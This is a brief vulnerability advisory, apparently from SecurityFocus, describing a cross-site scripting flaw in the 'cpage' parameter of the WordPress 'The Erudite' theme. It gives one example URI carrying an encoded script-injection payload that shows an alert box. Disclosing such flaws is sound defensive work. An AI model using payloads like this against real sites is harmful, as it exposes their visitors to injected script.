WordPress The Erudite Theme 'cpage' Parameter Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/?p=8&cpage="%20%3e%3c/a%3e%3cScRiPt%3ealert(123)%3c/ScRiPt%3e


 

Privacy Statement
Copyright 2010, SecurityFocus